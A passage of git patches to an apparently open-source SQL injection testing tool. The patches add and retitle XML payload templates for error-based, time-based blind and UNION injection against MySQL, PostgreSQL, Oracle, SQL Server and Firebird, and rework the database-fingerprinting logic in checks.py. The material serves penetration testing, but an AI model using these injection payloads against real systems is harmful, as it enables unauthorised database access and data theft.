+            <!-- These work as good as ELT(), but are longer
             <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
+            -->
+            <payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -729,15 +813,19 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
+        <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
+        <level>4</level>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
         <vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
+            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
+            -->
+            <payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -749,15 +837,19 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)</title>
+        <title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>
         <stype>2</stype>
-        <level>4</level>
-        <risk>0</risk>
+        <level>5</level>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
         <vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
+            -->
+            <payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -769,15 +861,19 @@
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
+        <title>MySQL &gt;= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>
         <stype>2</stype>
         <level>5</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
         <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
         <request>
+            <!-- These work as good as ELT(), but are longer
             <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+            -->
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -789,10 +885,35 @@
     </test>
 
     <test>
-        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &gt;= 4.1 error-based - ORDER BY, GROUP BY clause</title>
+        <stype>2</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>
+        <request>
+            <!-- These work as good as ELT(), but are longer
+            <payload>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            <payload>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+            -->
+            <payload>,ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 4.1</dbms_version>
+        </details>
+    </test>
+
+
+    <test>
+        <title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
         <stype>2</stype>
         <level>3</level>
-        <risk>0</risk>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
         <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
@@ -807,11 +928,30 @@
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
+        <request>
+            <payload>,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
+        <level>4</level>
+        <risk>1</risk>
         <clause>3</clause>
         <where>1</where>
         <vector>,(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>
@@ -829,10 +969,10 @@
     </test>
 
     <test>
-        <title>Oracle error-based - GROUP BY and ORDER BY clauses</title>
+        <title>Oracle error-based - ORDER BY, GROUP BY clause</title>
         <stype>2</stype>
-        <level>3</level>
-        <risk>0</risk>
+        <level>4</level>
+        <risk>1</risk>
         <clause>2,3</clause>
         <where>1</where>
         <vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
@@ -846,9 +986,28 @@
             <dbms>Oracle</dbms>
         </details>
     </test>
+
+    <test>
+        <title>Firebird error-based - ORDER BY clause</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
     <!--
          TODO: if possible, add payload for SQLite, Microsoft Access
          and SAP MaxDB - no known techniques at this time
     -->
-    <!-- End of error-based tests - GROUP BY and ORDER BY clauses -->
+    <!-- End of error-based tests - ORDER BY, GROUP BY clause -->
 </root>

From 4bbf168b1838412daea49ef03904c44c629ab402 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:35:13 +0000
Subject: [PATCH 356/492] Minor titles fix

---
 xml/payloads/05_time_blind.xml | 22 +++++++++++-----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index e8d90e26d..76a060a13 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -1352,9 +1352,9 @@
     <!-- End of time-based blind tests - Parameter replace -->
 
 
-    <!-- Time-based blind tests - GROUP BY and ORDER BY clause -->
+    <!-- Time-based blind tests - ORDER BY, GROUP BY clause -->
     <test>
-        <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title>
+        <title>MySQL &gt;= 5.0.11 time-based blind - ORDER BY, GROUP BY clause</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1374,7 +1374,7 @@
     </test>
 
     <test>
-        <title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
+        <title>MySQL &lt; 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1393,7 +1393,7 @@
     </test>
 
     <test>
-        <title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clause</title>
+        <title>PostgreSQL &gt; 8.1 time-based blind - ORDER BY, GROUP BY clause</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1413,7 +1413,7 @@
     </test>
 
     <test>
-        <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
+        <title>PostgreSQL time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1474,7 +1474,7 @@
     </test>
 
     <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title>
+        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1493,7 +1493,7 @@
     </test>
 
     <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
         <stype>5</stype>
         <level>3</level>
         <risk>1</risk>
@@ -1512,7 +1512,7 @@
     </test>
 
     <test>
-        <title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
+        <title>Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1531,7 +1531,7 @@
     </test>
 
     <test>
-        <title>HSQLDB &gt;= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
+        <title>HSQLDB &gt;= 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1552,7 +1552,7 @@
     </test>    
     
     <test>
-        <title>HSQLDB &gt; 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title>
+        <title>HSQLDB &gt; 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
         <stype>5</stype>
         <level>4</level>
         <risk>2</risk>
@@ -1571,5 +1571,5 @@
         </details>
     </test>
     <!-- TODO: if possible, add payload for Microsoft Access -->
-    <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
+    <!-- End of time-based blind tests - ORDER BY, GROUP BY clause -->
 </root>

From 4f939b5719716dfe9bd085c4f67696bc11064edd Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Fri, 20 Feb 2015 18:36:34 +0000
Subject: [PATCH 357/492] avoid false positive message when extensive heuristic
 check is performed following detection of boolean blind injection detection:
 do only heuristic DBMS fingerprint for DBMS specific tables

---
 lib/controller/checks.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index c86a3f61b..3f59095f5 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -650,9 +650,12 @@ def heuristicCheckDbms(injection):
 
     pushValue(kb.injection)
     kb.injection = injection
-    randStr1, randStr2 = randomStr(), randomStr()
 
     for dbms in getPublicTypeMembers(DBMS, True):
+        if not FROM_DUMMY_TABLE.get(dbms, ""):
+            continue
+
+        randStr1, randStr2 = randomStr(), randomStr()
         Backend.forceDbms(dbms)
 
         if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):

From 52dd92748a50bcee4fb979ea49185840ff6743b9 Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 02:23:42 +0000
Subject: [PATCH 358/492] rework some of the logic of the detection phase based
 on identified DBMS along the way

---
 lib/controller/checks.py | 81 +++++++++++++++++++++++++---------------
 1 file changed, 50 insertions(+), 31 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 3f59095f5..caec3152e 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -64,6 +64,7 @@ from lib.core.settings import DUMMY_XSS_CHECK_APPENDIX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
 from lib.core.settings import HEURISTIC_CHECK_ALPHABET
 from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
+from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import UNKNOWN_DBMS
 from lib.core.settings import URI_HTTP_HEADER
 from lib.core.settings import LOWER_RATIO_BOUND
@@ -89,7 +90,6 @@ def checkSqlInjection(place, parameter, value):
     kb.testMode = True
 
     paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
-
     tests = getSortedInjectionTests()
 
     while tests:
@@ -100,26 +100,38 @@ def checkSqlInjection(place, parameter, value):
                 break
 
             if conf.dbms is None:
+                # If the DBMS has not yet been fingerprinted (via simple heuristic check
+                # or via DBMS-specific payload) and boolean-based blind has been identified
+                # then attempt to identify with a simple DBMS specific boolean-based
+                # test what the DBMS may be
                 if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
-                    if not Backend.getIdentifiedDbms() and not kb.heuristicDbms:
-                        kb.heuristicDbms = heuristicCheckDbms(injection) or UNKNOWN_DBMS
+                    if not Backend.getIdentifiedDbms() and kb.heuristicDbms is False:
+                        kb.heuristicDbms = heuristicCheckDbms(injection)
 
-                if not conf.testFilter and (Backend.getErrorParsedDBMSes() or kb.heuristicDbms) not in ([], None, UNKNOWN_DBMS):
-                    if kb.reduceTests is None and Backend.getErrorParsedDBMSes():
-                        msg = "heuristic (parsing) test showed that the "
-                        msg += "back-end DBMS could be '%s'. " % (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-                        msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
-                        kb.reduceTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
+                # If the DBMS has already been fingerprinted (via DBMS-specific
+                # error message, simple heuristic check or via DBMS-specific
+                # payload), ask the user to limit the tests to the fingerprinted
+                # DBMS
+                if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
+                   SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
+                    msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+                    msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
+                    kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
-                    if kb.extendTests is None and (conf.level < 5 or conf.risk < 3):
-                        _ = (Format.getErrorParsedDBMSes() if Backend.getErrorParsedDBMSes() else kb.heuristicDbms)
-                        msg = "do you want to include all tests for '%s' " % _
-                        msg += "extending provided level (%d) and risk (%s) values? [Y/n]" % (conf.level, conf.risk)
-                        kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms])
-            elif kb.extendTests is None and (conf.level < 5 or conf.risk < 3):
-                msg = "do you want to include all tests for '%s' " % conf.dbms
-                msg += "extending provided level (%d) and risk (%s)? [Y/n]" % (conf.level, conf.risk)
-                kb.extendTests = [] if readInput(msg, default='Y').upper() != 'Y' else ([conf.dbms])
+            # If the DBMS has already been fingerprinted (via DBMS-specific
+            # error message, via simple heuristic check or via DBMS-specific
+            # payload), ask the user to extend the tests to all DBMS-specific,
+            # regardless of --level and --risk values provided
+            if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
+               and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
+               kb.heuristicDbms or injection.dbms):
+                msg = "do you want to include all tests for '%s' " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
+                msg += "extending provided "
+                msg += "level (%d)" % conf.level if conf.level < 5 else ""
+                msg += " and " if conf.level < 5 and conf.risk < 3 else ""
+                msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
+                msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
+                kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
 
             title = test.title
             kb.testType = stype = test.stype
@@ -179,9 +191,6 @@ def checkSqlInjection(place, parameter, value):
                 logger.debug(debugMsg)
                 continue
 
-            # Skip DBMS-specific test if it does not match either the
-            # previously identified or the user's provided DBMS (either
-            # from program switch or from parsed error message(s))
             if "details" in test and "dbms" in test.details:
                 dbms = test.details.dbms
             else:
@@ -198,20 +207,26 @@ def checkSqlInjection(place, parameter, value):
                     continue
 
             if dbms is not None:
-                if injection.dbms is not None and not intersect(injection.dbms, dbms):
+                # Skip DBMS-specific test if it does not match the
+                # previously identified DBMS (via DBMS-specific payload)
+                if injection.dbms is not None and not intersect(dbms, injection.dbms, True):
                     debugMsg = "skipping test '%s' because " % title
                     debugMsg += "the back-end DBMS identified is "
                     debugMsg += "%s" % injection.dbms
                     logger.debug(debugMsg)
                     continue
 
-                if conf.dbms is not None and not intersect(conf.dbms.lower(), [_.lower() for _ in arrayizeValue(dbms)]):
+                # Skip DBMS-specific test if it does not match the user's
+                # provided DBMS
+                if conf.dbms is not None and not intersect(dbms, conf.dbms, True):
                     debugMsg = "skipping test '%s' because " % title
                     debugMsg += "the provided DBMS is %s" % conf.dbms
                     logger.debug(debugMsg)
                     continue
 
-                if kb.reduceTests and not intersect(dbms, kb.reduceTests):
+                # Skip DBMS-specific test if it does not match the
+                # previously identified DBMS (via DBMS-specific error message)
+                if kb.reduceTests and not intersect(dbms, kb.reduceTests, True):
                     debugMsg = "skipping test '%s' because " % title
                     debugMsg += "the parsed error message(s) showed "
                     debugMsg += "that the back-end DBMS could be "
@@ -484,7 +499,7 @@ def checkSqlInjection(place, parameter, value):
                             configUnion(test.request.char, test.request.columns)
 
                             if not Backend.getIdentifiedDbms():
-                                if kb.heuristicDbms in (None, UNKNOWN_DBMS):
+                                if kb.heuristicDbms is None:
                                     warnMsg = "using unescaped version of the test "
                                     warnMsg += "because of zero knowledge of the "
                                     warnMsg += "back-end DBMS. You can try to "
@@ -646,7 +661,13 @@ def checkSqlInjection(place, parameter, value):
     return injection
 
 def heuristicCheckDbms(injection):
-    retVal = None
+    """
+    This functions is called when boolean-based blind is identified with a
+    generic payload and the DBMS has not yet been fingerprinted to attempt
+    to identify with a simple DBMS specific boolean-based test what the DBMS
+    may be
+    """
+    retVal = False
 
     pushValue(kb.injection)
     kb.injection = injection
@@ -667,7 +688,7 @@ def heuristicCheckDbms(injection):
     kb.injection = popValue()
 
     if retVal:
-        infoMsg = "heuristic (extended) test shows that the back-end DBMS "  # not as important as "parsing" counter-part (because of false-positives)
+        infoMsg = "heuristic (extended) test shows that the back-end DBMS "  # Not as important as "parsing" counter-part (because of false-positives)
         infoMsg += "could be '%s' " % retVal
         logger.info(infoMsg)
 
@@ -798,9 +819,7 @@ def heuristicCheckSqlInjection(place, parameter):
         return None
 
     origValue = conf.paramDict[place][parameter]
-
     paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
-
     prefix = ""
     suffix = ""
 
@@ -812,6 +831,7 @@ def heuristicCheckSqlInjection(place, parameter):
             suffix = conf.suffix
 
     randStr = ""
+
     while '\'' not in randStr:
         randStr = randomStr(length=10, alphabet=HEURISTIC_CHECK_ALPHABET)
 
@@ -879,8 +899,7 @@ def heuristicCheckSqlInjection(place, parameter):
 
     if value in (page or ""):
         infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
-        infoMsg += "'%s' might " % parameter
-        infoMsg += "be vulnerable to XSS attacks"
+        infoMsg += "'%s' might be vulnerable to XSS attacks" % parameter
         logger.info(infoMsg)
 
     kb.heuristicMode = False

From ef9d4b58ae8e2e74a0a71ede51a4c3f8c9dfa61c Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 02:24:03 +0000
Subject: [PATCH 359/492] minor signature for PHP pgsql functions

---
 xml/errors.xml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/xml/errors.xml b/xml/errors.xml
index c1530e27c..ebb7ddd0a 100644
--- a/xml/errors.xml
+++ b/xml/errors.xml
@@ -18,6 +18,7 @@
         <error regexp="valid PostgreSQL result"/>
         <error regexp="Npgsql\."/>
         <error regexp="org\.postgresql\.util\.PSQLException"/>
+        <error regexp="ERROR:\s\ssyntax error at or near "/>
     </dbms>
 
     <!-- Microsoft SQL Server -->

From 21c1ae427b91a2a8323bdc382461c562573645bb Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Sat, 21 Feb 2015 12:57:28 +0000
Subject: [PATCH 360/492] swapped generic and MySQL-specific UNION payloads -
 issue #1169

---
 xml/payloads/06_union_query.xml | 682 ++++++++++++++++----------------
 1 file changed, 341 insertions(+), 341 deletions(-)

diff --git a/xml/payloads/06_union_query.xml b/xml/payloads/06_union_query.xml
index 3a1218c90..7de66f9e1 100644
--- a/xml/payloads/06_union_query.xml
+++ b/xml/payloads/06_union_query.xml
@@ -2,6 +2,347 @@
 
 <root>
     <!-- UNION query tests -->
+    <test>
+        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>[COLSTART]-[COLSTOP]</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>1-10</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[CHAR]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>NULL</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
+        <where>1</where>
+        <vector>[UNION]</vector>
+        <request>
+            <payload/>
+            <comment>-- </comment>
+            <char>[RANDNUM]</char>
+            <columns>11-20</columns>
+        </request>
+        <response>
+            <union/>
+        </response>
+    </test>
+
+    <test>
+        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
+        <stype>6</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,4,5</clause>
